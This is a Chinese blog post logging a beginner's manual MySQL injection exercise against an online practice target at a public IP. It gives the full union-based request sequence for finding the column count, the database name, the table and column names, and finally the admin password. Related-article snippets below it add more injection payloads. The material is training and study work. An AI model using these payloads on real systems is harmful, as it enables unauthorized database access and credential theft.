简单的mysql注入练习

最新推荐文章于 2024-08-06 01:03:14 发布
最新推荐文章于 2024-08-06 01:03:14 发布
阅读量691 收藏 1
点赞数
分类专栏: 个人练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43208282/article/details/82825893
版权

练习记录
靶场地址是网络上找的http://120.203.13.75:6815/?id=1

第一步:检查是否有注入点
?id =1 and 1=1 判断为真
?id =1 and 1=2 判断为假 (and理解为数学中且的含义)

第二步:查找字段
http://120.203.13.75:6815/?id=1 order by 1,2
(从1往上加,在2时页面没有出错,判断有两个字段)

第三步:获取数据库信息(数据库名)
version() (Php+mysql注入(5.0以上)) 次数版本为5.5.53
usr()
database() (主要)

尝试在id后使用其他整数代替(暂时意味不明)
http://120.203.13.75:6815/?id=3 union select 1,database()
在这里插入图片描述

查询"maoshe"下的 表名信息

http://120.203.13.75:6815/?id=3 union select 1,table_name from information_schema.tables where table_schema = “maoshe”
在这里插入图片描述
选取指定表名admin,获取列名信息:
http://120.203.13.75:6815/?id=4 union select 1,column_name from information_schema.columns where table_name=“admin” limit 2,1
利用limit语句获取列名信息
0,1 id
1,1 username
2,1 password

直接获取admin表名下的password列名的数据:
http://120.203.13.75:6815/?id=4 union select 1,password from maoshe.admin
在这里插入图片描述

得出结果 hellohack

借鉴:

https://blog.csdn.net/qq_40467699/article/details/79981965
https://blog.csdn.net/qq_36135278/article/details/81712677

Mr.CGg
关注
专栏目录
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
MySQL注入基础练习
a3635398的博客
01-06 202
以sqli-labs-master作为练习 初始:简单获取基础内容 第一步,使用拼接的方式决定注入类型 第二部,使用order by确定有表单有几列值 order by根据指定的列对结果集进行排序 第三步,使用union select 来找到内容,获取想要得到内容 union select :联合查询 进阶,通过mysql注入获取表单内容,托库; 第一步:通...
sql注入练习
最新发布
m0_64734557的博客
08-06 949
打开文件在sql下面的db,可以查看账号、密码和名称有三种方式可以访问。1.通过域名访问(http://www.sqllabs.com)2.通过地址访问(127.0.0.1/qa)3.通过cx.cm软件进入如何通过软件进入先设置软件上面的各种配置安装没有的软件开启软件设置软件创建一个新的用户然后通过三种方法之一可以进入可以通过点击下面,直接进入。
简单MYSQL注入步骤和语句
Xiaokeo的博客
10-20 507
简单MYsql注入步骤分为:爆哭、爆表、爆字段、爆值。这六个步骤 首先是爆库: union select 1,2,3,database();# // 这里得看看有多少字段 爆表: 2. union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database();# // 这里得database() 指的是爆库中所爆破出来得数据库名,等于后面要加双引号。
MySQL一些简单注入题目...
m0_62107398的博客
02-19 3207
CTFHub——SQL注入 一.整数型注入 听xx的话,咱就输个1试试 通过提示可以知道有两行内容,然后就可以通过union 获取一些其他数据。 通过database获取该表存在的数据库sqli 继续使用information函数完成对表,字段的检索,获得flag。 二.字符型注入 单引号大胆猜测字符型,假装看不见字...反正就是注意闭合引号 不闭合就会这个样子 持续操作爆 库名,表名,字段名。 下次有用还叭叭。 ...
安全测试===Mysql 注入练习网站(3)
weixin_34095889的博客
09-18 175
http://redtiger.labs.overthewire.org/ 转载于:https://www.cnblogs.com/botoo/p/7541505.html
mysql注入环境
01-16
最后,`sqli-labs-master`是一个SQL注入练习平台,它提供了一系列逐步增加难度的挑战,让你通过实践来提高SQL注入防御技能。通过解决这些实验室中的问题,你可以学习到如何利用不同的注入技术,同时掌握如何避免这些...
MYSQL 注入天书
03-04
MySQL注入是一种安全漏洞利用手段,攻击者通过在Web应用的输入字段中输入恶意SQL代码,试图操控后台数据库,以获取敏感信息或对数据库执行非授权操作。由于SQL注入攻击的危害性极大,对网站安全构成严重威胁,因此...
MYSQL注入天书教程
02-08
SQLab是一个练习sql注入的平台,本文档介绍了平台搭建方法和每一关的详细讲解。
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
mysql注入靶场_某靶场的sql注入练习(MySQL)
weixin_42518709的博客
02-01 491
这个之前就做了,但是当时没有做记录,所以这次重新进行一次,顺便把过程记录下来,分享给大家。-----没什么技术含量,仅仅是一次练习的记录-----启动靶场好的,现在靶场启动成功,点击“[点击访问]”进入靶场。这里是主界面:从这里可以看到,需要通过sql注入来拿到用户登陆账号密码。然后这个页面除了登陆相关的内容可以点击,就只有“登录”按钮下面的公告可以点开,这里点开公告。这里看到了一条公告,而且我们...
渗透测试之SQL注入实战练习---Mysql+php注入练习环境
永不垂头的博客
08-06 891
渗透测试之SQL注入实战练习Mysql+php注入练习环境 渗透测试之SQL注入实战练习 靶机经典案例:Mysql+php注入练习环境(ACTcms,news.php?cid=2&listid=5&newsid=25,可练习outfile,admin/admin,后台上传php4) 方法一:(手工注入) 总共发现4个注入点 第一个listid 第二个 newsid 第三个 cid 第四个 proid 下面笔者将以第一个注入点listid为例展开阐述,详细注入过程如下: ① id后加’,页
sql mysql 手注_简单sql注入(手注)
weixin_42579969的博客
02-22 633
一、Sql简单手注的一般思路:1、 先看是不是注入点(字符型、整型)2、 判断字段数3、 判断是否可以用union联合查询(是否有显示位)4、 获取所有数据库名5、 获取数据库中表名6、 获取表中的字段名7、 获取字段中的信息数据1、 先看是不是注入点*加单引号 (‘)如果报错则可能存在输入?2-1页面变化(数值型)*数字型:and 1=1正常;and 1=2报错or 2>1 正常;or 1...
SQL注入练习
热门推荐
单核CPU的小朋友的博客
12-20 3万+
第一关 题目链接:http://43.247.91.228:84/Less-1 首先进行注入点测试。 通过报错我们知道这个是mysql数据库,而且使用单引号闭合,后台语句估计是 Select username from ‘{$id}’; 然后我们使用order by测试数据库当前列数。 接下来使用union查询来判断页面可回显的点。 我们通过联合查询来查看数据库的名字以及一些信息。 命令:1...
SQL注入(MySQL)
jxy158212的博客
01-02 1281
通过把SQL语言注入到Web的表单或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令目的的入侵行为。该博客以mysql数据库为例,讲解不同注入类型
mysql报错注入实战_MySQL手工注入实战
weixin_34972980的博客
02-02 182
实战记录,日本某站注入点 and 语句测试and1=1 返回正常,and=2跳回首页,可能过滤了用 ’ 测试返回错误页面判断为注入点order by语句查询字段数测试字段数为9and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9报错联合查询语句,查询显示位2、3为显示位使用注入函数可爆出数据库版本信息and 1=2 UNION SELECT 1,@@version_comp...
MySQL练习注入语句详解与宽字节注入
"Mysql练习注入语句" MySQL是一个广泛使用的开源关系型数据库管理系统,它的安全性对于任何使用它的系统都至关重要。本练习主要关注SQL注入,这是一种常见的安全漏洞,允许攻击者通过输入恶意的SQL语句来操控或获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值